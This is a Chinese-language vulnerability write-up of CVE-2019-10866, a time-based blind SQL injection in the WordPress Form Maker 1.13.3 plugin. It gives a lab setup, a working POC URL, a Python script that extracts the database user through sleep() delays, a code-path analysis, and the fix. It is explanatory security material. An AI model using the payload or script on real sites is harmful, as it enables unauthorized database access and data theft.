Form Maker 1.13.3 SQL注入分析(CVE-2019-10866)
字数 1230 2025-08-27 12:33:31

Form Maker 1.13.3 SQL注入漏洞分析(CVE-2019-10866)教学文档

1. 漏洞概述

Form Maker是WordPress的一个表单生成器插件,在1.13.3版本中存在一个SQL注入漏洞(CVE-2019-10866)。该漏洞存在于order by子句中,允许攻击者通过精心构造的请求执行任意SQL语句。

2. 漏洞环境搭建

2.1 基础环境

  • 使用Docker搭建LAMP环境(PHP 7.0)
  • 安装xdebug调试插件

2.2 配置文件

Dockerfile:

FROM medicean/vulapps:base_lamp_php7
RUN pecl install xdebug
COPY php.ini /etc/php/7.0/apache2/
COPY php.ini /etc/php/7.0/cli/

docker-compose.yml:

version: '3'
services:
  lamp-php7:
    build: .
    ports:
      - "80:80"
    volumes:
      - "/path/to/html:/var/www/html"
      - "/path/to/tmp:/tmp"

php.ini中xdebug配置:

[xdebug]
zend_extension="/usr/lib/php/20151012/xdebug.so"
xdebug.remote_enable=1
xdebug.remote_host=10.254.254.254
xdebug.remote_port=9000
xdebug.remote_connect_back=0
xdebug.profiler_enable=0
xdebug.idekey=PHPSTORM
xdebug.remote_log="/tmp/xdebug.log"

2.3 插件安装

  • WordPress版本:5.2.2
  • Form Maker插件版本:1.13.3
  • 下载地址:https://downloads.wordpress.org/plugin/form-maker.1.13.3.zip

3. 漏洞利用

3.1 POC

http://127.0.0.1/wp-admin/admin.php?page=submissions_fm&task=display&current_id=2&order_by=group_id&asc_or_desc=,(case+when+(select+ascii(substring(user(),1,1)))%3d114+then+(select+sleep(5)+from+wp_users+limit+1)+else+2+end)+asc%3b

3.2 Python利用脚本

import requests
import time

vul_url = "http://127.0.0.1/wp-admin/admin.php?page=submissions_fm&task=display&current_id=2&order_by=group_id&asc_or_desc="
S = requests.Session()
S.headers.update({"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,en;q=0.8,zh;q=0.5,en-US;q=0.3", "Referer": "http://127.0.0.1/wp-login.php?loggedout=true", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close", "Upgrade-Insecure-Requests": "1"})
length = 0
TIME = 3
username = "admin"
password = "admin"

def login(username, password):
    data = {
        "log": "admin", 
        "pwd": "admin", 
        "wp-submit": "\xe7\x99\xbb\xe5\xbd\x95", 
        "redirect_to": "http://127.0.0.1/wp-admin/", 
        "testcookie": "1"
        }
    r = S.post('http://127.0.0.1/wp-login.php', data=data, cookies = {"wordpress_test_cookie": "WP+Cookie+check"})

def attack():
    flag = True
    data = ""
    length = 1
    while flag:
        flag = False
        tmp_ascii = 0
        for ascii in range(32, 127):
            tmp_ascii = ascii
            start_time = time.time()
            payload = "{vul_url},(case+when+(select+ascii(substring(user(),{length},1)))%3d{ascii}+then+(select+sleep({TIME})+from+wp_users+limit+1)+else+2+end)+asc%3b".format(vul_url=vul_url, ascii=ascii, TIME=TIME, length=length)
            r = S.get(payload)
            tmp = time.time() - start_time
            if tmp >= TIME:
                flag = True
                break
        if flag:
            data += chr(tmp_ascii)
            length += 1
        print(data)

login(username, password)
attack()

4. 漏洞分析

4.1 漏洞触发流程

  1. 请求传入参数:page=submissions_fm&task=display
  2. form-maker.php实例化FMControllerSubmissions_fm并调用execute()方法
  3. Submissions_fm.php动态调用display方法
  4. 进入FMModelSubmissions_fm类的get_labels_parameters方法
  5. 获取asc_or_desc参数值,仅过滤\、&、<、>、"和'
  6. $order_by == group_id时,将$asc_or_desc拼接到$orderby变量
  7. 最终SQL语句执行:ORDER BY group_id ,(case when (select ascii(substring(user(),1,1)))=114 then (select sleep(5) from wp_users limit 1) else 2 end) asc

4.2 关键代码分析

漏洞位置wp-content/plugins/form-maker/admin/models/Submissions_fm.php

// 获取asc_or_desc参数
$asc_or_desc = WDW_FM_Library::get('asc_or_desc');

// 拼接SQL语句
if ($order_by == 'group_id') {
  $orderby .= $asc_or_desc;
}

参数过滤wp-content/plugins/form-maker/framework/WDW_FM_Library.php

public static function get($key, $default_value = '', $esc_html = true) {
  $value = isset($_GET[$key]) ? $_GET[$key] : $default_value;
  return self::validate_data($value, $default_value, $esc_html);
}

private static function validate_data($value, $default_value, $esc_html) {
  $value = stripslashes($value);
  if ($esc_html) {
    $value = esc_html($value);
  }
  return $value;
}

5. 漏洞修复

在1.13.4版本中,修复方式为限制asc_or_desc的值只能是descasc

$asc_or_desc = WDW_FM_Library::get('asc_or_desc');
if (!in_array(strtolower($asc_or_desc), array('desc', 'asc'))) {
  $asc_or_desc = '';
}

6. 防御建议

  1. 对所有用户输入进行严格过滤和验证
  2. 使用参数化查询或预处理语句
  3. 最小化数据库用户权限
  4. 及时更新插件到最新版本

7. 参考链接

  1. https://www.exploit-db.com/exploits/46958
  2. https://developer.wordpress.org/
Form Maker 1.13.3 SQL注入漏洞分析(CVE-2019-10866)教学文档 1. 漏洞概述 Form Maker是WordPress的一个表单生成器插件,在1.13.3版本中存在一个SQL注入漏洞(CVE-2019-10866)。该漏洞存在于order by子句中,允许攻击者通过精心构造的请求执行任意SQL语句。 2. 漏洞环境搭建 2.1 基础环境 使用Docker搭建LAMP环境(PHP 7.0) 安装xdebug调试插件 2.2 配置文件 Dockerfile : docker-compose.yml : php.ini 中xdebug配置: 2.3 插件安装 WordPress版本:5.2.2 Form Maker插件版本:1.13.3 下载地址:https://downloads.wordpress.org/plugin/form-maker.1.13.3.zip 3. 漏洞利用 3.1 POC 3.2 Python利用脚本 4. 漏洞分析 4.1 漏洞触发流程 请求传入参数: page=submissions_fm&task=display form-maker.php 实例化 FMControllerSubmissions_fm 并调用 execute() 方法 Submissions_fm.php 动态调用 display 方法 进入 FMModelSubmissions_fm 类的 get_labels_parameters 方法 获取 asc_or_desc 参数值,仅过滤 \、&、<、>、"和' 当 $order_by == group_id 时,将 $asc_or_desc 拼接到 $orderby 变量 最终SQL语句执行: ORDER BY group_id ,(case when (select ascii(substring(user(),1,1)))=114 then (select sleep(5) from wp_users limit 1) else 2 end) asc 4.2 关键代码分析 漏洞位置 : wp-content/plugins/form-maker/admin/models/Submissions_fm.php 参数过滤 : wp-content/plugins/form-maker/framework/WDW_FM_Library.php 5. 漏洞修复 在1.13.4版本中,修复方式为限制 asc_or_desc 的值只能是 desc 或 asc : 6. 防御建议 对所有用户输入进行严格过滤和验证 使用参数化查询或预处理语句 最小化数据库用户权限 及时更新插件到最新版本 7. 参考链接 https://www.exploit-db.com/exploits/46958 https://developer.wordpress.org/